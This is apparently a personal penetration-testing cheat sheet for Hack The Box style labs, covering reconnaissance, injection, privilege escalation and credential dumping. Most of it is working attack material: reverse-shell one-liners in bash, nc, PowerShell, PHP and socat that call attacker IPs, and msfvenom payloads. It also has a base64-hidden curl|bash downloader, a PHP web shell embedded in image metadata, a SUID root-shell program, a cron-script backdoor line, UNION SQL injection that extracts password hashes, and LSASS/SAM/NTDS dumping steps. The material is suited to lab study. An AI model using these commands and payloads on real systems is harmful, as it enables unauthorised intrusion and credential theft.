MD5 lookup: https://www.somd5.com/
JSON formatter: https://jsonformatter.curiousconcept.com/
SUID / sudo privilege escalation references:
https://gtfobins.github.io/ for Linux
https://lolbas-project.github.io/# for Windows
If a precompiled exploit fails on the target with:
```
./exploit: /lib/i386-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./exploit)
```
the target's glibc is older than the one the exploit was linked against. Recompile it statically on the attack box so the binary carries no runtime libc dependency (-m32 for a 32-bit target):
```
gcc exploit.c -static -m32 -o exploit
```
(The original command also passed -Wl,--rpath="$GLIBC_2_33_LD"; an rpath has no effect on a fully static binary, so it can be dropped.)
Scheduled tasks (cron):
/etc/crontab
/etc/cron.d/
/etc/cron.hourly, cron.daily, cron.weekly, cron.monthly (run via run-parts)
/var/spool/cron/crontabs/<user> (per-user crontabs; root's is only readable as root)
systemd timers:
systemctl list-timers --all
Cracking hashes with hashcat (-m 7400 = sha256crypt, the "$5$" format):
hashcat -m 7400 sammyhash /usr/share/wordlists/rockyou.txt
hashcat -m 7400 sammyhash --show    (--show only prints hashes already cracked into the potfile; run the attack first)
If hashcat aborts with:
```
Hashfile 'hash' on line 1 (admin:...ef1a54b012f6cf18968d9b9728b002b9): Token length exception
* Token length exception: 1/1 hashes
This error happens if the wrong hash type is specified, if the hashes are
malformed, or if input is otherwise not as expected (for example, if the
--username option is used but no username is present)
No hashes loaded.
```
the file carries a user:hash prefix (admin:...) that hashcat tries to parse as part of the hash. Add --username (also when listing results with --show), or check that -m actually matches the hash format.
Apache httpd 2.4.18:
https://www.exploit-db.com/exploits/34900
Ubuntu kernel exploit (OverlayFS, CVE-2023-2640 / CVE-2023-32629):
https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629
**SUID privilege escalation script**
Compile it, then as root: chown root:root file; chmod 6555 file (SUID + SGID, r-x for everyone). Any user who runs the binary afterwards gets a root shell.
```
#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <unistd.h>
#include <sys/types.h>

int main(void)
{
    /* The SUID/SGID bits only set the effective IDs. Copy them into the
       real IDs too, otherwise bash sees euid != ruid and drops privileges
       on startup. */
    setgid(getegid());
    setuid(geteuid());
    system("/bin/bash");
    return 0;
}
```
wpscan:
wpscan --url http://10.10.10.88/webservices/wp/ --plugins-detection aggressive -e p,u
(-e p = popular plugins, ap = all plugins, u = users; several values are comma-separated)
wpscan --url http://blocky.htb/ --password-attack wp-login -U Notch --passwords /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-10000.txt
Reading .jar files (decompiler):
jd-gui
Upgrading a raw shell (arrow keys print escape codes, no tab completion, no job control):
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
ctrl + z                       (background the shell)
stty raw -echo; fg             (on the attack box, then bring the shell back)
reset                          (if the screen is garbled)
stty rows 50 cols 200          (optional: match your own terminal size so less and editors behave)
nmap
Scan all ports first, then run service detection only against the open ones.
nmap -sS -p- --min-rate 1000 -T4 -oN nmap.txt <target>
>> -sS TCP SYN scan (needs root)
>> -sV -sC service/version detection and default NSE scripts (run these on the open ports)
>> -O OS detection
>> -sU UDP scan (slow; limit it with --top-ports or a port list)
>> -p- all 65535 ports
>> -sn host discovery only, no port scan
>> -sP legacy alias for -sn (it does not port-scan either)
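The two-phase scan described above as a script, added here as an example (not part of the original notes): a fast full-port sweep written in grepable format, a parser that pulls the open TCP ports out of it, and a second nmap run with -sV -sC restricted to those ports. The target 10.10.10.5 and the sample -oG output in sample_grepable() are constructed so the parser can be tried offline.

```bash
#!/usr/bin/env bash
# Two-phase nmap: SYN sweep of all ports, then -sV -sC only on what is open.
# Added example, not from the original notes. Target and sample output are
# constructed for illustration.

# Print the open TCP ports from an nmap grepable (-oG) file as "22,80,445".
# The Ports field looks like "22/open/tcp//ssh///, 80/open/tcp//http///":
# split on commas, then on slashes, and keep entries whose state is "open".
open_ports_from_grepable() {
  grep -E '^Host:.*Ports:' "$1" \
    | sed -E 's/.*Ports: //' \
    | tr ',' '\n' \
    | sed -E 's/^[[:space:]]+//' \
    | awk -F/ '$2 == "open" && $3 == "tcp" { print $1 }' \
    | sort -n | paste -sd, -
}

# Second-stage command: version detection and default scripts on the open
# ports only, instead of re-scanning all 65535 of them.
stage2_cmd() {
  printf 'nmap -sV -sC -p %s -oN nmap_services.txt %s\n' "$2" "$1"
}

# Full run against a live target (-sS needs root).
scan() {
  local target="$1" ports
  sudo nmap -sS -p- --min-rate 1000 -T4 -oG nmap_all.gnmap -oN nmap_all.txt "$target"
  ports=$(open_ports_from_grepable nmap_all.gnmap)
  if [ -z "$ports" ]; then
    echo "no open TCP ports found" >&2
    return 1
  fi
  echo "open: $ports" >&2
  sudo $(stage2_cmd "$target" "$ports")
}

# Constructed -oG output, shaped like what nmap writes, for an offline dry run.
sample_grepable() {
  cat <<'EOF'
# Nmap 7.94 scan initiated as: nmap -sS -p- -oG nmap_all.gnmap 10.10.10.5
Host: 10.10.10.5 ()    Status: Up
Host: 10.10.10.5 ()    Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 139/filtered/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///    Ignored State: closed (65531)
# Nmap done -- 1 IP address (1 host up) scanned in 10.00 seconds
EOF
}

# Usage: ./scan.sh 10.10.10.5   (real scan)
#        ./scan.sh              (dry run: prints the stage-2 command for the sample)
case "${1-}" in
  "") f=$(mktemp); sample_grepable > "$f"
      stage2_cmd 10.10.10.5 "$(open_ports_from_grepable "$f")"; rm -f "$f" ;;
  *)  scan "$1" ;;
esac
```

The dry run prints `nmap -sV -sC -p 22,80,445 -oN nmap_services.txt 10.10.10.5`; the filtered port 139 is left out because only entries whose state is open are kept.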
If the UDP scan finds SNMP (161/udp):
snmpwalk
snmpwalk -v {snmp version} -c public {ip}      (e.g. -v 2c)
```
snmpwalk: No securityName specified
```
means no version/community was given, so snmpwalk defaulted to SNMPv3; pass -v 1 or -v 2c together with -c <community>. If "public" is rejected, brute-force the community string:
```
onesixtyone -c /opt/useful/SecLists/Discovery/SNMP/snmp.txt 10.129.14.128
```
SMTP user enumeration:
smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -t 10.129.26.164
Port 88 (kerberos-sec):
Port 445 (SMB):
User enumeration by RID cycling over a guest/null session (this is not a password brute force):
crackmapexec smb 10.10.11.236 -u guest -p '' --rid-brute --local-auth
List shares with credentials:
smbclient -U admin -L //10.10.10.111
Check per-share permissions:
smbmap -u "admin" -p "imnothuman" -H 10.10.10.111 -P 445
Shell via msfconsole (needs an account that is a local administrator on the target):
exploit/windows/smb/psexec
MSSQL credential check: crackmapexec mssql {ip} -u user.txt -p user.txt --no-bruteforce
(--no-bruteforce pairs line N of the user file with line N of the password file instead of trying every combination)
MSSQL with NTLM / Windows authentication:
https://academy.hackthebox.com/module/116/section/1169
SSH remote (reverse) port forwarding and SOCKS proxy:
GatewayPorts yes    (in the remote host's sshd_config, only needed if the -R port must listen on 0.0.0.0 instead of 127.0.0.1)
ssh -R 1233:localhost:1233 webadmin@10.129.229.129 -i ssh -D 9050
(-R: connections to port 1233 on the remote host are forwarded back to 127.0.0.1:1233 on the attack box; -D 9050: a SOCKS proxy on the attack box that tunnels through the remote host)
Port 5901, VNC:
vncviewer -passwd secret localhost:5901    (-passwd takes the path to a VNC password file, not the plaintext password)
nmap vulnerability scripts:
nmap --script vuln 10.10.10.79
If nmap finds no ports at all, the host may use port knocking (the sequence is in /etc/knockd.conf once you are on the box):
knock <ip> <port1> <port2> <port3>
Large scan output: pipe it through sort -u to sort and de-duplicate
Unknown ports: connect with telnet or nc and send a few lines to see what comes back
Generating web shells:
laudanum
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.110.130 LPORT=8787 -f war -o payload.war
https://academy.hackthebox.com/module/158/section/1428
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<InternalIPofPivotHost> LPORT=8080 -f exe -o backupscript.exe
bash -c "bash -i >& /dev/tcp/10.10.15.68/1222 0>&1"
Appending a reverse shell to a writable script that something else runs (e.g. a root cron job):
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh
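Finding that monitor.sh in the first place is the cron enumeration from the scheduled-tasks section above. The script below, added here as an example and not part of the original notes, reads the system crontab format (/etc/crontab and /etc/cron.d/*), pulls every absolute path out of the command part, and reports the ones that are world-writable. It checks the mode bits rather than [ -w ], which would answer yes to everything when run as root. The crontab used in the usage note is constructed.

```bash
#!/bin/sh
# Find scripts referenced from system crontabs that are world-writable.
# Added example, not from the original notes.

# Does the file exist with the other-write bit set? Uses find -perm -002
# (a mode-bit test) so the answer is the same whether or not you are root.
is_world_writable() {
  [ -f "$1" ] && [ -n "$(find "$1" -maxdepth 0 -perm -002 2>/dev/null)" ]
}

# For one crontab in system format (m h dom mon dow user command, or
# @reboot user command) print "<cronfile>:<path>" for every absolute path in
# the command part that is world-writable. Comments, blank lines and
# VAR=value lines are skipped.
writable_cron_targets() {
  cronfile="$1"
  grep -Ev '^[[:space:]]*(#|$)|^[A-Za-z_][A-Za-z0-9_]*=' "$cronfile" \
    | awk '{ start = ($1 ~ /^@/) ? 3 : 7
             for (i = start; i <= NF; i++) if ($i ~ /^\//) print $i }' \
    | while IFS= read -r path; do
        if is_world_writable "$path"; then
          printf '%s:%s\n' "$cronfile" "$path"
        fi
      done
  return 0
}

# Walk the standard locations. Per-user crontabs in /var/spool/cron are only
# readable as root, so they are normally out of reach at this stage.
scan_system_cron() {
  for f in /etc/crontab /etc/cron.d/*; do
    [ -f "$f" ] && writable_cron_targets "$f"
  done
  return 0
}

# Usage: sh cron_writable.sh --scan
if [ "${1-}" = "--scan" ]; then
  scan_system_cron
fi
```

Given a constructed crontab containing `*/5 * * * * root /bin/bash /tmp/x/monitor.sh` with monitor.sh at mode 666 and `@reboot root /tmp/x/backup.sh` at mode 755, only `<cronfile>:/tmp/x/monitor.sh` is printed; /bin/bash is examined too but is not world-writable. Whatever is reported is a candidate for the tee -a line above.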
Bind shell: run this on the target, then connect from the attack box with nc 10.129.41.200 7777:
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f
Windows PowerShell reverse shell:
1.ps1:
`$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()`
PHP:
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.6/4444 0>&1'");
socat (these two lines come from different boxes; the listener and client ports must match):
socat TCP4:10.10.14.5:8443 EXEC:/bin/bash                 (on the target; for a real TTY use EXEC:/bin/bash,pty,stderr,setsid,sigint,sane)
socat file:`tty`,raw,echo=0 tcp-listen:4443               (on the attack box; gives a fully interactive shell)
`powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"`
Listener (Metasploit multi/handler):
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.110.130
LHOST => 192.168.110.130
msf6 exploit(multi/handler) > set LPORT 8787
LPORT => 8787
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.110.130:8787
[*] Sending stage (58829 bytes) to 192.168.110.140
[*] Meterpreter session 1 opened (192.168.110.130:8787 -> 192.168.110.140:43974) at 2024-02-16 00:05:16 -0500
meterpreter > shell
Reverse shell:
If nc is available:
Kali: nc -lvp 112
Target: nc -e /bin/bash 192.168.110.130 112     (-e needs nc.traditional or ncat; the OpenBSD nc shipped by Debian/Ubuntu does not have it)
Python wrapper around the same nc call:
```
#!/usr/bin/env python
# Reverse shell via nc -e; requires a netcat build that supports -e.
import os
import sys

try:
    os.system('nc -e /bin/bash 10.10.14.2 9999')
except Exception:
    sys.exit(1)
```
Hashes:
Identification:
https://hashes.com/en/tools/hash_identifier
hash-identifier {hash}
hashcat -a selects the attack mode:
-a 0: straight (dictionary) attack, optionally with rules (-r)
-a 1: combinator attack (every word of one list joined with every word of another)
-a 3: brute-force / mask attack (?d digit, ?l lowercase, ?u uppercase, ?s special, ?a all)
-a 6: hybrid attack, wordlist followed by a mask (-a 7 is mask followed by wordlist)
hashcat -m 1400 h -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d
= SHA2-256 (-m 1400) of susan_nasus_ followed by nine digits (000000000 .. 999999999)
Web shell via image upload:
Option 1: prepend the GIF magic bytes GIF89a to the PHP payload so a content-type check sees a GIF
Option 2: hide the payload in the metadata of a real image:
exiftool -Comment='<?php system("nc 10.10.14.15 1234 -e /bin/bash"); ?>' 1.png
Either way the file only executes if the server hands it to PHP, so upload it as shell.php.png (or .php.gif) and check which double extension the server actually runs
Manual SQL injection:
When injecting through the address bar, URL-encode first; characters such as & and # are otherwise parsed as part of the URL
Intercept the request with Burp Suite and send it to Repeater
In Repeater, watch the response length and timing in the lower right to judge whether the injection changed anything

Things to try, in order:
1.
admin' or '1'='1      (or admin' or '1'LIKE'1 if = is filtered)
admin' or '1'='1'--   (or admin' or '1'LIKE'1'-- if = is filtered)
2.
Any credentials already collected elsewhere
3.
admin'
admin''
admin'''
Watch whether the response size in bytes changes
4.
Boolean-based injection:
edit the parameter in the decoded view on the right side of Repeater
admin' and 1=1--      (admin' && 1=1-- if "and" is filtered)
admin' and '1'='1     (admin' && '1'='1 if "and" is filtered)
5.
Time-based injection:
admin' and sleep(10) ='1'--   (admin' and sleep(10) LIKE '1'--)
admin' and sleep(10) ='1      (admin' and sleep(10) LIKE '1)
>When the injection works the response takes about 10 seconds
Then replace sleep(10) with '1' and resend
>The response length drops from 916 bytes to 893 bytes,
so admin' or '1' like '1 in the password field logs in.
If none of that works (code injection into a template tag, from one specific box; the parameter is a URL-encoded <%= system("...") %>):
category1=a///A77ss/e%0A;<%25%3d+system("echo IyEvYmluL2Jhc2gKYmFzaCAgLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIxLzIyMjIgMD4mMSIK | base64 -d | bash")+%25>+
(the base64 decodes to a bash reverse shell to 10.10.14.121:2222)
The base64 must not contain = here: change the port number until the padding disappears, or pad the script with trailing newlines until its length is a multiple of 3

_________________________________________________________________
First http://10.10.10.143/room.php?cod=101-1
renders normally (the arithmetic is evaluated server-side, so the value reaches the query unquoted)
http://10.10.10.143/room.php?cod=100'
page loads but shows no content
http://10.10.10.143/room.php?cod=1 and 1=2
page loads but shows no content
>injectable
Find the column count: add one column at a time until the page shows content again
http://10.10.10.143/room.php?cod=100 UNION SELECT 1;-- -
http://10.10.10.143/room.php?cod=100 UNION SELECT 1,2;-- -
....
http://10.10.10.143/room.php?cod=100 UNION SELECT 1,2,3,4,5,6,7;-- -    (7 columns here)
List DBs
>php?cod=100 **UNION SELECT 1, group_concat(schema_name), 3, 4, 5, 6, 7 from information_schema.schemata;-- -**
>
Output:hotel,information_schema,mysql,performance_schema
Show Tables in hotel
>php?cod=100 **UNION SELECT 1, group_concat(table_name), 3, 4, 5, 6, 7 from information_schema.tables where table_schema='hotel' ;-- -**
>
Output:room
Show Columns in room
>php?cod=100 **UNION SELECT 1, group_concat(column_name), 3, 4, 5, 6, 7 from information_schema.columns where table_name='room';-- -**
>
Output:cod,name,price,descrip,star,image,mini
Show Tables in mysql
>php?cod=100 **UNION SELECT 1, group_concat(table_name), 3, 4, 5, 6, 7 from information_schema.tables where table_schema='mysql' ;-- -**
>
Output:
column_stats,columns_priv,db,event,func, general_log,gtid_slave_pos,help_category, help_keyword,help_relation,help_topic,host, index_stats,innodb_index_stats,innodb_table_stats, plugin,proc,procs_priv,proxies_priv,roles_mapping, servers,slow_log,table_stats,tables_priv,time_zone, time_zone_leap_second,time_zone_name, time_zone_transition,time_zone_transition_type,user
Show Columns in user
>php?cod=100 **UNION SELECT 1, group_concat(column_name), 3, 4, 5, 6, 7 from information_schema.columns where table_name='user';-- - **
Output:Host,User,Password,Select_priv,Insert_priv,Update_priv, Delete_priv,Create_priv,Drop_priv,Reload_priv, Shutdown_priv,Process_priv,File_priv,Grant_priv, References_priv,Index_priv,Alter_priv,Show_db_priv, Super_priv,Create_tmp_table_priv,Lock_tables_priv, Execute_priv,Repl_slave_priv,Repl_client_priv, Create_view_priv,Show_view_priv,Create_routine_priv, Alter_routine_priv,Create_user_priv,Event_priv, Trigger_priv,Create_tablespace_priv,ssl_type,ssl_cipher, x509_issuer,x509_subject,max_questions,max_updates, max_connections,max_user_connections,plugin, authentication_string,password_expired,is_role, default_role,max_statement_time
Get Username / Password
>php?cod=100 **UNION SELECT 1, user,3, 4,password, 6, 7 from mysql.user;-- - **
Output:
DBadmin
2D2B7A5E4E637B8FBA1D17F40318F277D29964D0
(40 hex characters from mysql.user.Password is the MySQL 4.1+ double-SHA1 format, normally shown with a leading *; crack it with hashcat -m 300)
_________________________________________________________________
Directory brute forcing behind authentication:
Usually a valid session is needed first: log in normally, intercept with Burp, and copy the Authorization header from Repeater,
then pass it to dirb with -H "Authorization: XXXXX"
Cookies can be added the same way (-H "Cookie: ...")
Web tips:
1. If a page loads forever, open F12 > Network > Reload, then block the requests that never get a response; keep DevTools open, closing it removes the block
2. A parameterised URL such as ?seacher=xxx is an injection candidate
* Send it to Burp Repeater as before
>seacher' seacher'' seacher''' ... and watch the response length in bytes
>seacher'+and+'1'='1
* If nothing changes, fall back to fuzzing
3. Fuzzing
Usage: ffuf -w /usr/share/wordlists/dirb/common.txt -u http://ip:port/....../?seacher=FUZZ -H 'cookie copied from Burp' -H 'authorization copied from Burp' -mc 200 -o fuzz.log
>FUZZ marks the injection point
>-H adds headers for authentication
>-mc 200 keeps only responses with status 200
>-o writes the results to a file for later grep filtering
>-of csv switches the output to CSV when the JSON is hard to read


Then grep away the results that share the same response length
>In the CSV most rows have length 11674; cat fuzz.log | grep -v 11674 filters them out (-v inverts the match)
What remains are the parameters the application actually reacts to, e.g. id
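The grep -v 11674 step, generalised so you do not have to spot the common length by eye: the script below, added here as an example and not part of the original notes, reads ffuf's -of csv output, finds the content_length column by its header name (so the exact column order of the ffuf version in use does not matter), works out the most common length, and prints only the rows that differ from it. The CSV in sample_csv() is constructed in the shape ffuf writes.

```bash
#!/bin/sh
# Print the ffuf CSV rows whose response length is not the modal one.
# Added example, not from the original notes; sample data is constructed.

# Usage: uncommon_length_rows fuzz.csv
uncommon_length_rows() {
  awk -F, '
    NR == 1 {
      # locate the content_length column from the header
      for (i = 1; i <= NF; i++) if ($i == "content_length") col = i
      if (!col) { print "no content_length column in header" > "/dev/stderr"; exit 1 }
      next
    }
    NF == 0 { next }                                  # skip blank trailing lines
    { rows[NR] = $0; len[NR] = $col; count[$col]++ }  # remember row and tally lengths
    END {
      best = ""
      for (l in count) if (best == "" || count[l] > count[best]) best = l
      for (r = 2; r <= NR; r++) if ((r in rows) && len[r] != best) print rows[r]
    }' "$1"
}

# Constructed CSV in ffuf -of csv layout: three "default" pages of 11674
# bytes and one parameter (id) that changed the response.
sample_csv() {
  cat <<'EOF'
FUZZ,url,redirectlocation,position,status_code,content_length,content_words,content_lines,content_type,duration,resultfile
a,http://10.10.10.10/?a=FUZZ,,1,200,11674,300,50,text/html,10ms,
id,http://10.10.10.10/?id=FUZZ,,2,200,12001,310,52,text/html,12ms,
b,http://10.10.10.10/?b=FUZZ,,3,200,11674,300,50,text/html,9ms,
c,http://10.10.10.10/?c=FUZZ,,4,200,11674,300,50,text/html,11ms,
EOF
}

# Usage: sh fuzz_outliers.sh fuzz.csv   (or no argument to run on the sample)
if [ -n "${1-}" ]; then
  uncommon_length_rows "$1"
else
  f=$(mktemp); sample_csv > "$f"; uncommon_length_rows "$f"; rm -f "$f"
fi
```

On the sample only the id row is printed. Because it keys off the most common length, it still works when the baseline is not 11674 and when more than one parameter reacts.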

Use whatever command execution you get to upload a payload or to test for outbound connectivity for a shell, or read /etc/ssh/sshd_config and look for
* PubkeyAuthentication yes
* AuthorizedKeysFile
* AllowUsers, which restricts which accounts may log in over SSH
In this example SSH is restricted to thebobs but the current user is samir,
so privilege escalation is needed; try:
sudo -l to list sudo rights
If we have read access to a user's .ssh directory we may be able to read their private key at /home/user/.ssh/id_rsa and use it to log in.
If we can read /root/.ssh/ and the id_rsa inside it, copy it to our machine and log in with the -i flag:
```
kappamoss@htb[/htb]$ vim id_rsa
kappamoss@htb[/htb]$ chmod 600 id_rsa
kappamoss@htb[/htb]$ ssh user@10.10.10.10 -i id_rsa
```
SSH brute force:
hydra -L user.list -P password.list ssh://10.129.42.197
SSH logs in with a password or a key pair; sshd ignores key files with loose permissions, so check:
1. .ssh directory: 700
2. authorized_keys: 600
First get the private key off the target,
copy it to the attack box and chmod 0400 id_rsa
then from the attack box:
ssh thebobs@192.168.2.104 -i id_rsa -o PubkeyAcceptedKeyTypes=+ssh-rsa
> -o PubkeyAcceptedKeyTypes=+ssh-rsa re-enables the SHA-1 based ssh-rsa signature algorithm, which OpenSSH 8.8+ clients disable by default; needed against old servers. Newer clients name the option PubkeyAcceptedAlgorithms, and -o HostKeyAlgorithms=+ssh-rsa may be required as well
> -i id_rsa selects the key, so no password is asked for
Port forwarding with -L:
ssh -L <local_port>:<target_host>:<target_port> <user>@<pivot>
>e.g. local Kali port 8082 mapped to port 8800 on 192.168.122.65: -L 8082:192.168.122.65:8800
Inside a Python shell:
>import pty;
>pty.spawn("/bin/bash")
Other shells, if python is available:
python -c 'import pty;pty.spawn("/bin/bash")'
Then drop linpeas.sh on the target to gather information.
If wget is not possible, base64-encode the file, paste it over and decode it on the target.

Then check the kernel/distro version with uname -a
and search for usable exploits with searchsploit (prefer .c files)
If the target has no gcc, compile on the attack box with gcc -static xxx.c -o xxx,
then base64-encode the binary, paste it onto the target, decode it and chmod +x it
Read the .c file before compiling; many exploits state special build requirements in the header comment
If there is an internal network to pivot into, gather information again after getting root: linpeas
netstat -lntp lists listening ports, e.g. to see whether a database is present
>3306 = MySQL
Passwords stored in databases are sometimes base64-encoded several times over

Web filename injection:
Found injectable; change sleep(10) to:
XSS:
Use beef-xss
>insert the hook tag into the vulnerable field
not a tty:
python -c 'import pty; pty.spawn("/bin/bash")'
Directory scanning:
gobuster dir -u http://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -x txt,php,html -t 100
Subdomain scanning:
subfinder -d hackerone.com -v
Recursive directory/file scan:
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://academy.htb/FUZZ -recursion -recursion-depth 1 -e .php -v
Parameter fuzzing, GET (-fs filters out the default response size):
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://faculty.academy.htb:32178/courses/linux-security.php7?FUZZ=KEY -fs xxx
Parameter fuzzing, POST:
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://faculty.academy.htb:32178/courses/linux-security.php7 -X POST -d 'FUZZ=KEY' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx
Then confirm a hit manually with
curl http://admin.academy.htb:31390/admin/admin.php -X POST -d 'id=key' -H 'Content-Type: application/x-www-form-urlencoded'
Stuck at an Apache OFBiz login page: try the authentication bypass
https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass/tree/master
No entry point on the web site: look for virtual hosts
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:31390/ -H 'Host: FUZZ.academy.htb' -fs 900
gobuster vhost -w=/usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u devvortex.htb --append-domain --no-error -t 10
ffuf -w ./vhosts -u http://192.168.10.10 -H "HOST: FUZZ.randomtarget.com" -fs 612

SMB:
smbclient -L //10.10.10.123
smbclient -N //10.10.10.123/general        (-N: no password, null session)
smbclient -N //10.10.10.123/Development
DNS:
subbrute (recommended)
dig, AXFR zone transfer:
dig axfr friendzone.red @10.10.10.123
or
subfinder
https://markfhunt.com/hackthebox-active-subdomain-enumeration/
Reusing an existing session:
>F12 > Storage > Cookies > edit the value
Common reverse shells:
https://github.com/six2dez/pentest-book/blob/master/exploitation/reverse-shells.md
Web injection when spaces are filtered: ${IFS} expands to the field separator (a space by default), and base64 keeps the real command out of the filtered input
```
${IFS} stands in for a space
echo${IFS}"Y3VybCAxMC4xMC4xNC40OjEyMjIvY29kZS5zaHxiYXNo"|base64${IFS}-d|bash;
```
(the base64 decodes to curl 10.10.14.4:1222/code.sh|bash)
Listening sockets:
netstat -an      (or ss -lntp)
Running processes:
ps auxww
MySQL UDF privilege escalation:
show variables like "%secure_file_priv%";
If secure_file_priv is empty, the server may read/write files anywhere, see:
https://github.com/SEC-GO/Red-vs-Blue/blob/master/linux%E7%8E%AF%E5%A2%83%E4%B8%8B%E7%9A%84MySQL%20UDF%E6%8F%90%E6%9D%83.md
Joomla! unauthenticated information disclosure (CVE-2023-23752; leaks the configuration including the MySQL credentials) PoC:
https://github.com/yusinomy/CVE-2023-23752
Then check /administrator/templates/atum/index.php
Zip cracking:
zip2john 1.zip > 1.john, then john (below)
fcrackzip -D -c a -p /usr/share/wordlists/rockyou.txt --use-unzip 1.zip
redis: redis-cli -h 10.10.10.160
john:
john 1.john --wordlist=/usr/share/wordlists/rockyou.txt
mysql:
mysql -u robin -h 10.129.184.54 -p
mssql:
https://academy.hackthebox.com/module/116/section/1169
sqlcmd -S SRVMSSQL\SQLEXPRESS -U julio -P 'MyPassword!' -y 30 -Y 30
sqsh -S 10.129.203.7 -U julio -P 'MyPassword!' -h
>
> python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py backdoor:Password1@10.129.245.64 -windows-auth
>
> select name from sys.databases
oracle:
> sudo odat passwordguesser -p 1521 -d XE -s 10.129.205.19
rdp:
xfreerdp /u:Administrator /v:10.129.92.152
IMAP:
openssl s_client -connect <ip>:imaps
1 LOGIN username password
1 LIST "" *
1 SELECT INBOX
1 FETCH 1 RFC822
Subdomain (vhost) enumeration:
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://83.136.255.150:32178 -H "Host: FUZZ.academy.htb" -fs xxx
Find which file extensions the server accepts:
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://faculty.academy.htb:32178/indexFUZZ
amass enum -d githubapp.com -v
gobuster dns -d githubapp.com -w /usr/share/wordlists/dirb/common.txt
Default credentials:
https://raw.githubusercontent.com/ihebski/DefaultCreds-cheat-sheet/main/DefaultCreds-Cheat-Sheet.csv
Windows base64 encode/decode:
https://stackoverflow.com/questions/16945780/decoding-base64-in-batch
Windows: dump stored plaintext credentials (LaZagne):
https://github.com/AlessandroZ/LaZagne/releases
Windows: dump the SAM, SYSTEM and SECURITY hives and extract the hashes/LSA secrets offline:
https://academy.hackthebox.com/module/147/section/1315
```
C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save
The operation completed successfully.
C:\WINDOWS\system32> reg.exe save hklm\system C:\system.save
The operation completed successfully.
C:\WINDOWS\system32> reg.exe save hklm\security C:\security.save
The operation completed successfully.
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
```
LSASS memory dump:
```
Open Task Manager > Select the Processes tab > Find & right click the Local Security Authority Process > Select Create dump file
or
(usually flagged by antivirus)
get the PID:
PS C:\Windows\system32> Get-Process lsass
PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump <pid> C:\lsass.dmp full
then on Kali:
pypykatz lsa minidump /home/peter/Documents/lsass.dmp
== MSV ==
Username: bob
Domain: DESKTOP-33E7O54
LM: NA
NT: 64f12cddaa88057e06a81b54e73b949b
SHA1: cba4e545b7ec918129725154b29f055e4cd5aea8
DPAPI: NA
```
https://academy.hackthebox.com/module/147/section/1359
AD NTDS.dit:
```
net user xxx    (check whether the account is in Domain Admins)
PS C:\> vssadmin CREATE SHADOW /For=C:
PS C:\NTDS> cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit
(use the shadow copy name vssadmin printed; NTDS.dit is useless without the SYSTEM hive, which holds the boot key)
or, with SMB credentials of a domain admin:
crackmapexec smb 10.129.202.85 -u JMarston -p P@ssword! --ntds
Crack the NT hashes (-m 1000 = NTLM):
sudo hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt
```
Linux: dumping stored credentials:
```
firefox
https://academy.hackthebox.com/module/147/section/1320
Decrypting Firefox Credentials:
https://github.com/unode/firefox_decrypt
python3.9 firefox_decrypt.py
or
laZagne.py
```
Pass the Hash (PtH):
